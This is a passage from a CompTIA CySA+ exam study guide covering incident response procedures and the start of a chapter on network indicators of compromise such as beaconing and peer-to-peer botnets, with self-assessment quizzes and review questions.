information (PHI)
KennedyKassebaum Act
Also known as HIPAA
4. It is the role of ____________________ to develop job
descriptions for those persons who will be hired for
positions involved in incident response.
5. List at least one of the roles of senior leadership in incident
response.
6. Match the following terms with their definitions.
Terms
Definitions
Personally
identifiable
information
Measure of the importance of the data
Criticality
Any piece of data that can be used alone or
with other information to identify a single
person
Sensitivity
Medical records of individuals
Personal health
information
Measure of how freely data can be handled
7. The most important factor in the success of an incident
response plan is the support, both verbal and financial
(through the budget process), of ________________
8. List at least one consideration when assigning a level of
criticality.
9. Match the following terms with their definitions.
Term
s
Definitions
Pat
ent
Gives an organization a competitive edge; includes recipes,
formulas, ingredient listings, and so on
Tra
de
sec
ret
Identifies a product protected from being used by another
organization
Tra
de
Ensures that a work that is authored is protected from any
form of reproduction or use without the consent of the
ma
rk
holder
Co
pyr
igh
t
Granted to an individual or a company to protect an
invention
10. Salaries of employees is considered
_________________________________________
_____
Chapter 16
Applying the Appropriate
Incident Response
Procedure
This chapter covers the following topics related to Objective 4.2
(Given a scenario, apply the appropriate incident response
procedure) of the CompTIA Cybersecurity Analyst (CySA+) CS0002 certification exam:
Preparation: Describes steps required to be ready for an incident,
including training, testing, and documentation of procedures.
Detection and analysis: Covers detection methods and analysis,
exploring topics such as characteristics contributing to severity level
classification, downtime, recovery time, data integrity, economic
impact, system process criticality, reverse engineering, and data
correlation.
Containment: Identifies methods used to separate and confine
the damage, including segmentation and isolation.
Eradication and recovery: Defines activities that return the
network to normal, including vulnerability mitigation, sanitization,
reconstruction/reimaging, secure disposal, patching, restoration or
permissions, reconstitution of resources, restoration of capabilities
and services, and verification of logging/communication to security
monitoring.
Post-incident activities: Identifies operations that should follow
incident recovery, including evidence retention, lessons learned
report, change control process, incident response plan update,
incident summary report, IoC generation, and monitoring.
When a security incident occurs, there are usually several
possible responses. Choosing the correct response and
appropriately applying that response is a critical part of the
process. This second chapter devoted to the incident response
process presents the many considerations that go into making
the correct decisions regarding response.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these ten self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table
16-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 16-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questions
Preparation
1, 2
Detection and Analysis
3, 4
Containment
5, 6
Eradication and Recovery
7, 8
Post-Incident Activities
9, 10
1. Which of the following is the first step in the incident
response process?
1. Containment
2. Eradication and recovery
3. Preparation
4. Detection
2. Which of the following groups should receive technical
training on configuring and maintaining security controls?
1. High-level management
2. Middle management
3. Technical staff
4. Employees
3. Which of the following characteristics of an incident is a
function of how widespread the incident is?
1. Scope
2. Downtime
3. Data integrity
4. Indicator of compromise
4. Which of the following is the average time required to repair
a single resource or function?
1. RPO
2. MTD
3. MTTR
4. RTO
5. Which of the following processes involves limiting the scope
of an incident by leveraging existing segments of the
network as barriers to prevent the spread to other segments?
1. Isolation
2. Segmentation
3. Containerization
4. Partitioning
6. How do you isolate a device at Layer 2 without removing it
from the network?
1. Port security
2. Isolation
3. Secured memory
4. Processor encryption
7. Which of the following includes removing data from the
media so that it cannot be reconstructed using normal file
recovery techniques and tools?
1. Destruction
2. Clearing
3. Purging
4. Buffering
8. Which of the following refers to removing all traces of a
threat by overwriting the drive multiple times to ensure that
the threat is removed?
1. Destruction
2. Clearing
3. Purging
4. Sanitization
9. Which of the following refers to behaviors and activities that
precede or accompany a security incident?
1. IoCs
2. NOCs
3. IONs
4. SOCs
10. Which of the following is the first document that should be
drafted after recovery from an incident?
1. Incident summary report
2. Incident response plan
3. Lessons learned report
4. IoC document
FOUNDATION TOPICS
PREPARATION
When security incidents occur, the quality of the response is
directly related to the amount and the quality of the
preparation. Responders should be well prepared and equipped
with all the tools they need to provide a robust response. Several
key activities must be carried out to ensure this is the case.
Training
The terms security awareness training, security training, and
security education are often used interchangeably, but they are
actually three different things. Basically, security awareness
training is the what, security training is the how, and security
education is the why. Security awareness training reinforces the
fact that valuable resources must be protected by implementing
security measures. Security training teaches personnel the skills
they need to perform their jobs in a secure manner.
Organizations often combine security awareness training and
security training and label it as “security awareness training” for
simplicity; the combined training improves user awareness of
security and ensures that users can be held accountable for their
actions. Security education is more independent, targeted at
security professionals who require security expertise to act as
in-house experts for managing the security programs.
Security awareness training should be developed based on the
audience. In addition, trainers must understand the corporate
culture and how it will affect security. The audiences you need
to consider when designing training include high-level
management, middle management, technical personnel, and
other staff.
For high-level management, the security awareness training
must provide a clear understanding of potential risks and
threats, effects of security issues on organizational reputation
and financial standing, and any applicable laws and regulations
that pertain to the organization’s security program. Middle
management training should discuss policies, standards,
baselines, guidelines, and procedures, particularly how these
components map to individual departments. Also, middle
management must understand their responsibilities regarding
security. Technical staff should receive technical training on
configuring and maintaining security controls, including how to
recognize an attack when it occurs. In addition, technical staff
should be encouraged to pursue industry certifications and
higher education degrees. Other staff need to understand their
responsibilities regarding security so that they perform their
day-to-day tasks in a secure manner. With these staff, providing
real-world examples to emphasize proper security procedures is
effective.
Personnel should sign a document that indicates they have
completed the training and understand all the topics. Although
the initial training should occur when personnel are hired,
security awareness training should be considered a continuous
process, with future training sessions occurring at least
annually.
Testing
After incident response processes have been developed as
described in Chapter 15, “The Incident Response Process,”
responders should test the process to ensure it is effective. In
Chapter 20, “Applying Security Concepts in Support of
Organizational Risk Mitigation,” you’ll learn about exercises
that can be performed that help to test your response to a live
attack (red team/blue team/white team exercises and tabletop
exercises). The results of tests along with the feedback from live
events can help to inform the lessons learned report, described
later in this chapter.
Documentation of Procedures
Incident response procedures should be clearly documented.
While many incident response plan templates can be found
online (and even the outline of this chapter is organized by one
set of procedures), a generally accepted incident response plan
is shown in Figure 16-1 and described in the list that follows.
Figure 16-1 Incident Response Process
Step 1. Detect: The first step is to detect the incident. The
worst sort of incident is one that goes unnoticed.
Step 2. Respond: The response to the incident should be
appropriate for the type of incident. A denial of service
(DoS) attack against a web server would require a
quicker and different response than a missing mouse
in the server room. Establish standard responses and
response times ahead of time.
Step 3. Report: All incidents should be reported within a
time frame that reflects the seriousness of the incident.
In many cases, establishing a list of incident types and
the person to contact when each type of incident
occurs is helpful. Attention to detail at this early stage,
while time-sensitive information is still available, is
critical.
Step 4. Recover: Recovery involves a reaction designed to
make the network or system affected functional again.
Exactly what that means depends on the circumstances
and the recovery measures available. For example, if
fault-tolerance measures are in place, the recovery
might consist of simply allowing one server in a cluster
to fail over to another. In other cases, it could mean
restoring the server from a recent backup. The main
goal of this step is to make all resources available
again.
Step 5. Remediate: This step involves eliminating any
residual danger or damage to the network that still
might exist. For example, in the case of a virus
outbreak, it could mean scanning all systems to root
out any additional affected machines. These measures
are designed to make a more detailed mitigation when
time allows.
Step 6. Review: Finally, you need to review each incident to
discover what can be learned from it. Changes to
procedures might be called for. Share lessons learned
with all personnel who might encounter the same type
of incident again. Complete documentation and
analysis are the goals of this step.
The actual investigation of an incident occurs during the
respond, report, and recover steps. Following appropriate
forensic and digital investigation processes during an
investigation can ensure that evidence is preserved.
Your responses will benefit from using standard forms that
prompt for the collection of all relevant information that can
lead to a better and more consistent response process over time.
Some examples of commonly used forms are as follows:
Incident form: This form is used to describe the incident in detail.
It should include sections to record complementary metal oxide
semiconductor (CMOS), hard drive information, image archive
details, analysis platform information, and other details. The best
approach is to obtain a template and customize it to your needs.
Call list/escalation list: First responders to an incident should
have contact information for all individuals who might need to be
alerted during the investigation. This list should also indicate under
what circumstance these individuals should be contacted to avoid
unnecessary alerts and to keep the process moving in an organized
manner.
DETECTION AND ANALYSIS
Once evidence from an incident has been collected, it must be
analyzed and classified as to its severity so that more critical
incidents can be dealt with first and less critical incidents later.
Characteristics Contributing to Severity Level
Classification
To properly prioritize incidents, each must be classified with
respect to the scope of the incident and the types of data that
have been put at risk. Scope is more than just how widespread
the incident is, and the types of data classifications may be more
varied than you expect. The following sections discuss the
factors that contribute to incident severity and prioritization.
The scope determines the impact and is a function of how
widespread the incident is and the potential economic and
intangible impacts it could have on the business. Five common
factors are used to measure scope. They are covered in the
following sections.
Downtime and Recovery Time
One of the issues that must be considered is the potential
amount of downtime the incident could inflict and the time it
will take to recover from the incident. If a proper business
continuity plan (BCP) has been created, you will have collected
information about each asset that will help classify incidents
that affect each asset.
As part of determining how critical an asset is, you need to
understand the following terms:
Maximum tolerable downtime (MTD): This is the maximum
amount of time that an organization can tolerate a single resource
or function being down. This is also referred to as maximum period
time of disruption (MPTD).
Mean time to repair (MTTR): This is the average time required
to repair a single resource or function when a disaster or disruption
occurs.
Mean time between failures (MTBF): This is the estimated
amount of time a device will operate before a failure occurs. This
amount is calculated by the device vendor. System reliability is
increased by a higher MTBF and lower MTTR.
Recovery time objective (RTO): This is the shortest time
period after a disaster or disruptive event within which a resource
or function must be restored in order to avoid unacceptable
consequences. RTO assumes that an acceptable period of downtime
exists. RTO should be smaller than MTD.
Work recovery time (WRT): This is the difference between
RTO and MTD, which is the remaining time that is left over after
the RTO before reaching the MTD.
Recovery point objective (RPO): This is the point in time to
which the disrupted resource or function must be returned.
Each organization must develop its own documented criticality
levels. The following is a good example of organizational
resource and function criticality levels:
Critical: Critical resources are those resources that are most vital
to the organization’s operation and should be restored within
minutes or hours of the disaster or disruptive event.
Urgent: Urgent resources should be restored within 24 hours but
are not considered as important as critical resources.
Important: Important resources should be restored within 72
hours but are not considered as important as critical or urgent
resources.
Normal: Normal resources should be restored within 7 days but
are not considered as important as critical, urgent, or important
resources.
Nonessential: Nonessential resources should be restored within
30 days.
Data Integrity
Data integrity refers to the correctness, completeness, and
soundness of the data. One of the goals of integrity services is to
protect the integrity of data or at least to provide a means of
discovering when data has been corrupted or has undergone an
unauthorized change. One of the challenges with data integrity
attacks is that the effects might not be detected for years—until
there is a reason to question the data. Identifying the
compromise of data integrity can be made easier by using filehashing algorithms and tools to check seldom-used but
sensitive files for unauthorized changes after an incident. These
tools can be run to quickly identify files that have been altered.
They can help you get a better assessment of the scope of the
data corruption.
Economic
The economic impact of an incident is driven mainly by the
value of the assets involved. Determining those values can be
difficult, especially for intangible assets such as plans, designs,
and recipes. Tangible assets include computers, facilities,
supplies, and personnel. Intangible assets include intellectual
property, data, and organizational reputation. The value of an
asset should be considered with respect to the asset owner’s
view. The following considerations can be used to determine an
asset’s value:
Value to owner
Work required to develop or obtain the asset
Costs to maintain the asset
Damage that would result if the asset were lost
Cost that competitors would pay for the asset
Penalties that would result if the asset were lost
After determining the value of assets, you should determine the
vulnerabilities and threats to each asset.
System Process Criticality
Some assets are not actually information but systems that
provide access to information. When these system or groups of
systems provide access to data required to continue to do
business, they are called critical systems. While it is somewhat
simpler to arrive at a value for physical assets such as servers,
routers, switches, and other devices, in cases where these
systems provide access to critical data or are required to
continue a business-critical process, their value is more than the
replacement cost of the hardware. The assigned value should be
increased to reflect its importance in providing access to data or
its role in continuing a critical process.
Reverse Engineering
Reverse engineering can refer to retracing the steps in an
incident, as seen from the logs in the affected devices or in logs
of infrastructure devices that may have been involved in
transferring information to and from the devices. This can help
you understand the sequence of events. When unknown
malware is involved, the term reverse engineering may refer to
an analysis of the malware’s actions to determine a removal
technique. This is the approach to zero-day attacks in which no
known fix is yet available from anti-malware vendors. With
respect to reverse engineering malware, this process refers to
extracting the code from the binary executable to identify how it
was programmed and what it does. There are three ways the
binary malware file can be made readable:
Disassembly: This refers to reading the machine code into
memory and then outputting each instruction as a text string.
Analyzing this output requires a very high level of skill and special
software tools.
Decompiling: This process attempts to reconstruct the high-level
language source code.
Debugging: This process steps though the code interactively.
There are two kinds of debuggers:
Kernel debugger: This type of debugger operates at ring 0
(essentially the driver level) and has direct access to the kernel.
Usermode debugger: This type of debugger has access to only
the usermode space of the operating system. Most of the time,
this is enough, but not always. In the case of rootkits or even
super-advanced protection schemes, it is preferable to step into a
kernel mode debugger instead because usermode in such
situations is untrustworthy.
Data Correlation
Data correlation is the process of locating variables in the
information that seem to be related. For example, say that every
time there is a spike in SYN packets, you seem to have a DoS
attack. When you apply these processes to the data in security
logs of devices, it helps you identify correlations that help you
identify issues and attacks. A good example of such a system is a
security information event management (SIEM) system. These
systems collect the logs, analyze the logs, and, through the use
of aggregation and correlation, help you identify attacks and
trends. SIEM systems are covered in more detail in Chapter 11,
“Analyzing Data as Part of Security Monitoring Activities.”
CONTAINMENT
Just as the first step when an injury occurs is to stop the
bleeding, after a security incident occurs, the first priority is to
contain the threat to minimize the damage. There are a number
of containment techniques. Not all of them are available to you
or advisable in all situations. One of the benefits of proper
containment is that it gives you time to develop a good
remediation strategy.
Segmentation
The segmentation process involves limiting the scope of an
incident by leveraging existing segments of the network as
barriers to prevent the spread to other segments. These
segments could be defined at either Layer 3 or Layer 2 of the
OSI reference model.
When you segment at Layer 3, you are creating barriers based
on IP subnets. These are either physical LANs or VLANs.
Creating barriers at this level involves deploying access control
lists (ACLs) on the routers to prevent traffic from moving from
one subnet to another. While it is possible to simply shut down
a router interface, in some scenarios that is not advisable
because the interface is used to reach more subnets than the one
where the threat exists.
Segmenting at Layer 2 can be done in several ways:
You can create VLANs, which create segmentation at both Layer 2
and Layer 3.
You can create private VLANs (PVLANs), which segment an
existing VLAN at Layer 2.
You can use port security to isolate a device at Layer 2 without
removing it from the network.
In some cases, it might be advisable to use segmentation at the
perimeter of the network (for example, stopping the outbound
communication from an infected machine or blocking inbound
traffic).
Isolation
Isolation typically is implemented by either blocking all traffic
to and from a device or devices or by shutting down device
interfaces. This approach works well for a single compromised
system but becomes cumbersome when multiple devices are
involved. In that case, segmentation may be a more advisable
approach. If a new device can be set up to perform the role of
the compromised device, the team may leave the device running
to analyze the end result of the threat on the isolated host.
Another form of isolation, process isolation is a technique
whereby all processes (work being performed by the processor)
are executed using memory dedicated to each process. This
prevents processes from accessing the memory of other
processes, which can help to mitigate attacks that do so.
ERADICATION AND RECOVERY
After the threat has been contained, the next step is to remove
or eradicate the threat. In some cases the compromised device
can be cleaned without a format of the hard drive, while in
many other cases this must be done to completely remove the
threat. This section looks at some removal approaches.
Vulnerability Mitigation
Once the specific vulnerability has been identified, it must be
mitigated. This mitigation will in large part be driven by the
type of issue with which you are presented. In some cases the
proper response will be to format the hard drive of the affected
system and reimage it. In other cases the mitigation may be a
change in policies, when a weakness is revealed that results
from the way the organization operates. Let’s look at some
common mitigations.
Sanitization
Sanitization refers to removing all traces of a threat by
overwriting the drive multiple times to ensure that the threat is
removed. This works well for mechanical hard disk drives, but
solid-state drives present a challenge in that they cannot be
overwritten. Most solid-state drive vendors provide sanitization
commands that can be used to erase the data on the drive.
Security professionals should research these commands to
ensure that they are effective.
Note
NIST Special Publication 800-88 Rev. 1 is an example of a government
guideline for proper media sanitization, as are the IRS guidelines for proper
media sanitization:
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.80088r1.pdf
https://www.irs.gov/privacy-disclosure/media-sanitization-guidelines
Reconstruction/Reimaging
Once a device has been sanitized, the system must be rebuilt.
This can be done by reinstalling the operating system, applying
all system updates, reinstalling the anti-malware software, and
implementing any organization security settings. Then, any
needed applications must be installed and configured. If the
device is a server that is running some service on behalf of the
network (for example, DNS or DHCP), that service must be
reconfigured as well. All this is not only a lot of work, it is timeconsuming. A better approach is to maintain standard images of
the various device types in the network so that you can use these
images to stand up a device quickly. To make this approach
even more seamless, having a backup image of the same device
eliminates the need to reconfigure everything you might have to
reconfigure when using standard images.
Secure Disposal
In some instances, you may decide to dispose of a compromised
device (or its storage drive) rather than attempt to sanitize and
reuse the device. In that case, you want to dispose of it in a
secure manner. In the case of secure disposal, an organization
must consider certain issues, including the following:
Does removal or replacement introduce any security holes in the
network?
How can the system be terminated in an orderly fashion to avoid
disrupting business continuity?
How should any residual data left on any systems be removed?
Are there any legal or regulatory issues that would guide the
destruction of data?
Whenever data is erased or removed from storage media,
residual data can be left behind. This can allow data to be
reconstructed when the organization disposes of the media, and
unauthorized individuals or groups may be able to gain access
to the data. When considering data remanence, security
professionals must understand three countermeasures:
Clearing: Clearing includes removing data from the media so that
it cannot be reconstructed using normal file recovery techniques
and tools. With this method, the data is recoverable only using
special forensic techniques.
Purging: Also referred to as sanitization, purging makes the data
unreadable even with advanced forensic techniques. With this
technique, data should be unrecoverable.
Destruction: Destruction involves destroying the media on which
the data resides. Degaussing, another destruction technique,
exposes the media to a powerful, alternating magnetic field,
removing any previously written data and leaving the media in a
magnetically randomized (blank) state. Physical destruction
involves physically breaking the media apart or chemically altering
it.
Patching
In many cases, a threat or an attack is made possible by missing
security patches. You should update or at least check for
updates for a variety of components. This includes all patches
for the operating system, updates for any applications that are
running, and updates to all anti-malware software that is
installed. While you are at it, check for any firmware update the
device may require. This is especially true of hardware security
devices such as firewalls, IDSs, and IPSs. If any routers or
switches are compromised, check for software and firmware
updates.
Restoration of Permissions
Many times an attacker compromises a device by altering the
permissions, either in the local database or in entries related to
the device in the directory service server. All permissions should
undergo a review to ensure that all are in the appropriate state.
The appropriate state may not be the state they were in before
the event. Sometimes you may discover that although
permissions were not set in a dangerous way prior to an event,
they are not correct. Make sure to check the configuration
database to ensure that settings match prescribed settings. You
should also make changes to the permissions based on lessons
learned during an event. In that case, ensure that the new
settings undergo a change control review and that any approved
changes are reflected in the configuration database.
Reconstitution of Resources
In many incidents, resources may be deleted or stolen. In other
cases, the process of sanitizing the device causes the loss of
information resources. These resources should be recovered
from backup. One key process that can minimize data loss is to
shorten the time between backups for critical resources. This
results in a recovery point objective (RPO) that includes more
recent data. RPO is discussed in more detail earlier in this
chapter.
Restoration of Capabilities and Services
During the incident response, it might be necessary to disrupt
some of the normal business processes to help contain the issue
or to assist in remediation. It is also possible that the attack has
rendered some services and capabilities unavailable. Once an
effective response has been mounted, these systems and
services must be restored to full functionality. As shortening the
backup time can help to reduce the effects of data loss, faulttolerant measures can be effective in preventing the loss of
critical services.
Verification of Logging/Communication to Security
Monitoring
To ensure that you will have good security data going forward,
you need to ensure that all logs related to security are collecting
data. Pay special attention to the manner in which the logs react
when full. With some settings, the log begins to overwrite older
entries with new entries. With other settings, the service stops
collecting events when the log is full. Security log entries need to
be preserved. This may require manual archiving of the logs and
subsequent clearing of the logs. Some logs make this possible
automatically, whereas others require a script. If all else fails,
check the log often to assess its state.
Many organizations send all security logs to a central location.
This could be a Syslog server, or it could be a SIEM system.
These systems not only collect all the logs, they use the
information to make inferences about possible attacks. Having
access to all logs allows the system to correlate all the data from
all responding devices.
Regardless of whether you are logging to a Syslog server or a
SIEM system, you should verify that all communications
between the devices and the central server are occurring
without a hitch. This is especially true if you had to rebuild the
system manually rather than restore from an image, as there
would be more opportunity for human error in the rebuilding of
the device.
POST-INCIDENT ACTIVITIES
Once the incident has been contained and removed and the
recovery process is complete, there is still work to be done.
Much of it, as you might expect, is paperwork, but this
paperwork is critical to enhancing the response to the next
incident. Let’s look at some of these post-incident activities that
should take place.
Evidence Retention
If the incident involved a security breach and the incident
response process gathered evidence to prove an illegal act or a
violation of policy, the evidence must be stored securely until it
is presented in court or is used to confront the violating
employee. Computer investigations require different procedures
than regular investigations because the time frame for the
computer investigator is compressed, and an expert might be
required to assist in the investigation. Also, computer
information is intangible and often requires extra care to ensure
that the data is retained in its original format. Finally, the
evidence in a computer crime is difficult to gather.
After a decision has been made to investigate a computer crime,
you should follow standardized procedures, including the
following:
Identify what type of system is to be seized.
Identify the search and seizure team members.
Determine the risk of the suspect destroying evidence.
After law enforcement has been informed of a computer crime,
the constraints on the organization’s investigator are increased.
Turning over an investigation to law enforcement to ensure that
evidence is preserved properly might be necessary.
When investigating a computer crime, evidentiary rules must be
addressed. Computer evidence should prove a fact that is
material to the case and must be reliable. The chain of custody
must be maintained. Computer evidence is less likely to be
admitted in court as evidence if the process for producing it is
not documented.
Lessons Learned Report
The first document that should be drafted is a lessons
learned report, which briefly lists and discusses what was
learned about how and why the incident occurred and how to
prevent it from occurring again. This report should be compiled
during a formal meeting shortly after recovery from the
incident. This report provides valuable information that can be
used to drive improvement in the security posture of the
organization. This report might answer questions such as the
following:
What went right, and what went wrong?
How can we improve?
What needs to be changed?
What was the cost of the incident?
Change Control Process
The lessons learned report may generate a number of changes
that should be made to the network infrastructure. All these
changes, regardless of how necessary they are, should go
through the standard change control process. They should be
submitted to the change control board, examined for
unforeseen consequences, and studied for proper integration
into the current environment. Only after gaining approval
should they be implemented. You may find it helpful to create a
“fast track” for assessment in your change management system
for changes such as these when time is of the essence. For more
details regarding change control processes, refer to Chapter 8,
“Security Solutions for Infrastructure Management.”
Incident Response Plan Update
The lessons learned exercise may also uncover flaws in your IR
plan. If this is the case, you should update the plan
appropriately to reflect the needed procedure changes. When
this is complete, ensure that all software and hard copy versions
of the plan have been updated so everyone is working from the
same document when the next event occurs.
Incident Summary Report
All stakeholders should receive a document that summarizes the
incident. It should not have an excessive amount of highly
technical language in it, and it should be written so
nontechnical readers can understand the major points of the
incident. The following are some of the highlights that should be
included in an incident summary report:
When the problem was first detected and by whom
The scope of the incident
How it was contained and eradicated
Work performed during recovery
Areas where the response was effective
Areas that need improvement
Indicator of Compromise (IoC) Generation
Indicators of compromise (IoCs) are behaviors and
activities that precede or accompany a security incident. In
Chapter 17, “Analyzing Potential Indicators of Compromise,”
you will learn what some of these indicators are and what they
may tell you. You should always record or generate the IOCs
that you find related to the incident. This information may be
used to detect the same sort of incident later, before it advances
to the point of a breach.
Monitoring
As previously discussed, it is important to ensure that all
security surveillance tools (IDS, IPS, SIEM, firewalls) are back
online and recording activities and reporting as they should be,
as discussed in Chapter 11. Moreover, even after you have taken
all steps described thus far, consider using a vulnerability
scanner to scan the devices or the network of devices that were
affected. Make sure before you do so that you have updated the
scanner so it can recognize the latest vulnerabilities and threats.
This will help catch any lingering vulnerabilities that may still
be present.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 16-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 16-2 Key Topics for Chapter 16
Key Topic Element
Description
Page Number
Figure 16-1
Incident response process
453
Bulleted list
Key incident forms
454
Bulleted list
Recovery terminology
455
Bulleted list
Criticality levels
456
Bulleted list
Asset value considerations
456
Bulleted list
Reverse engineering techniques
457
Bulleted list
Segmenting at Layer 2
459
Bulleted list
Disposal considerations
460
Bulleted list
Data removal methods
461
Bulleted list
Lesson learned considerations
464
Bulleted list
Incident summary report considerations
464
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
incident form
call list/escalation list
scope
maximum tolerable downtime (MTD)
mean time to repair (MTTR)
mean time between failures (MTBF)
recovery time objective (RTO)
work recovery time (WRT)
recovery point objective (RPO)
reverse engineering
disassembly
decompiling
debugging
kernel debugger
usermode debugger
data correlation
segmentation
isolation
sanitization
clearing
purging
destruction
lessons learned report
incident summary report
indicator of compromise (IoC)
REVIEW QUESTIONS
1. When security incidents occur, the quality of the response is
directly related to the amount of and quality of the
____________.
2. List the steps, in order, of the incident response process.
3. Match the following terms with their definitions.
Terms
Definitions
Maximu
m
tolerable
downtim
e (MTD)
The estimated amount of time a device will operate
before a failure occurs
Mean
time to
repair
(MTTR)
The shortest time period after a disaster or
disruptive event within which a resource or function
must be restored in order to avoid unacceptable
consequences
Mean
time
between
failures
(MTBF)
The maximum amount of time that an organization
can tolerate a single resource or function being
down
Recovery
time
objective
(RTO)
The average time required to repair a single
resource or function
4. ____________________ involves eliminating any
residual danger or damage to the network that still might
exist.
5. List at least two considerations that can be used to
determine an asset’s value.
6. Match the following terms with their definitions.
Term
s
Definitions
Se
gm
ent
ati
on
Making the data unreadable even with advanced forensic
techniques
Sa
niti
zat
ion
Removing data from the media so that it cannot be
reconstructed using normal file recovery techniques and
tools
Cle
ari
ng
Removing all traces of a threat by overwriting the drive
multiple times
Pu
Limiting the scope of an incident by leveraging existing
rgi
ng
segments of the network as barriers to prevent the spread
to other segments
7. The _______________________ should indicate under
what circumstance individuals should be contacted to avoid
unnecessary alerts and to keep the process moving in an
organized manner.
8. List at least one way the binary malware file can be made
readable.
9. Match the following terms with their definitions.
Terms
Definitions
Disassem
bly
Retracing the steps in an incident, as seen from the
log
Reverse
engineeri
ng
Process that attempts to reconstruct the high-level
language source code
Debuggin
g
Steps though the code interactively
Decompil
ing
Reading the machine code into memory and then
outputting each instruction as a text string
10. ______________________ are behaviors and activities
that precede or accompany a security incident.
Chapter 17
Analyzing Potential
Indicators of Compromise
This chapter covers the following topics related to Objective 4.3
(Given an incident, analyze potential indicators of compromise)
of the CompTIA Cybersecurity Analyst (CySA+) CS0-002
certification exam:
Network-related indicators of compromise: Includes
bandwidth consumption, beaconing, irregular peer-to-peer
communication, rogue device on the network, scan/sweep, unusual
traffic spike, and common protocol over non-standard port.
Host-related indicators of compromise: Covers processor
consumption, memory consumption, drive capacity consumption,
unauthorized software, malicious process, unauthorized change,
unauthorized privilege, data exfiltration, abnormal OS process
behavior, file system change or anomaly, registry change or
anomaly, and unauthorized scheduled task.
Application-related indicators of compromise: Includes
anomalous activity, introduction of new accounts, unexpected
output, unexpected outbound communication, service interruption,
and application log.
Indicators of compromise (IOCs) are somewhat like clues
left at the scene of a crime except they also include clues that
preceded the crime. IOCs help us to anticipate security issues
and also to reconstruct the process that was taken to cause the
security issue or breach. This chapter examines some common
IOCs and what they might indicate.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 17-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 17-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questions
Network-Related Indicators of Compromise
1, 2, 3
Host-Related Indicators of Compromise
4, 5, 6
Application-Related Indicators of Compromise
7, 8, 9
1. Which of the following IoCs is most likely from a DoS
attack?
1. Beaconing
2. Irregular peer-to-peer communication
3. Bandwidth consumption
4. Rogue device on the network
2. Which of the following IoCs is most likely an indication of a
botnet?
1. Beaconing
2. Irregular peer-to-peer communication
3. Bandwidth consumption
4. Rogue device on the network
3. Which of the following is used to locate live devices?
1. Ping sweep
2. Port scan
3. Pen test
4. Vulnerability test
4. Which of the following metrics cannot be found in Windows
Task Manager?
1. Memory consumption
2. Drive capacity consumption
3. Processor consumption
4. Unauthorized software
5. Which of the following utilities is a freeware task manager
that offers more functionality than Windows Task Manager?
1. System Information
2. Process Explorer
3. Control Panel
4. Performance
6. Which of the following is a utility built into the Windows 10
operating system that checks for system file corruption?
1. TripWire
2. System File Checker
3. sigver
4. SIEM
7. Which of the following might be an indication of a
backdoor?
1. Introduction of new accounts
2. Unexpected output
3. Unexpected outbound communication
4. Anomalous activity
8. Within which of the following tools is the Application log
found?
1. Event Viewer
2. Performance
3. System Information
4. App Locker
9. Which of the following is not an application-related IoC?
1. Introduction of new accounts
2. Unexpected output
3. Unexpected outbound communication
4. Beaconing
FOUNDATION TOPICS
NETWORK-RELATED INDICATORS OF
COMPROMISE
Security analysts, regardless of whether they are operating in
the role of first responder or in a supporting role analyzing
issues, should be aware of common indicators of compromise.
Moreover, they should be aware of the types of incidents
implied by each IOC. This can lead to a quicker and correct
choice of action when time is of the essence. It is helpful to
examine these IOCs in relation to the component that is
displaying the IOC.
Certain types of network activity are potential indicators of
security issues. The following sections describe the most
common of the many network-related symptoms.
Bandwidth Consumption
Whenever bandwidth usage is above normal and there is no
known legitimate activity generating the traffic, you should
suspect security issues that generate unusual amounts of traffic,
such as denial-of-service (DoS) or distributed denial-of-service
(DDoS) attacks. For this reason, benchmarks should be created
for normal bandwidth usage at various times during the day.
Then alerts can be set when activity rises by a specified
percentage at those various times. Many free network
bandwidth monitoring tools are available. Among them are
BitMeter OS, FreeMeter Bandwidth Monitor, BandwidthD, and
PRTG Network Monitor. Anomaly-based intrusion detection
systems can also “learn” normal traffic patterns and can set off
alerts when unusual traffic is detected. Figure 17-1 shows an
example of setting an alert in BitMeter.
Figure 17-1 Setting an Alert in BitMeter
Beaconing
Beaconing refers to traffic that leaves a network at regular
intervals. This type of traffic could be generated by
compromised hosts that are attempting to communicate with
(or call home) the malicious party that compromised the host.
While there are security products that can identify beacons,
including firewalls, intrusion detection systems, web proxies,
and SIEM systems, creating and maintaining baselines of
activity will help you identify beacons that are occurring during
times of no activity (for example, at night). When this type of
traffic is detected, you should search the local source device for
scripts that may be generating these calls home.
Irregular Peer-to-Peer Communication
If traffic occurring between peers within a network is normal
but communications are irregular, this may be an indication of a
security issue. At the very least, illegal file sharing could be
occurring, and at the worst, this peer-to-peer (P2P)
communication could be the result of a botnet. Peer-to-peer
botnets differ from normal botnets in their structure and
operation. Figure 17-2 shows the structure of a traditional
botnet. In this scenario, all the zombies communicate directly
with the command and control server, which is located outside
the network. The limitation of this arrangement and the issue
that gives rise to peer-to-peer botnets is that devices that are
behind a NAT server or proxy server cannot participate. Only
devices that can be reached externally can do so.
Figure 17-2 Traditional Botnet
In a peer-to-peer botnet, devices that can be reached
externally are compromised and run server software that turns
them into command and control servers for the devices that are
recruited internally that cannot communicate with the
command and control server operating externally. Figure 17-3
shows this arrangement.
Figure 17-3 Peer-to-Peer Botnet
Regardless of whether peer-to-peer traffic is used as part of a
botnet or simply as a method of file sharing, it presents the
following security issues:
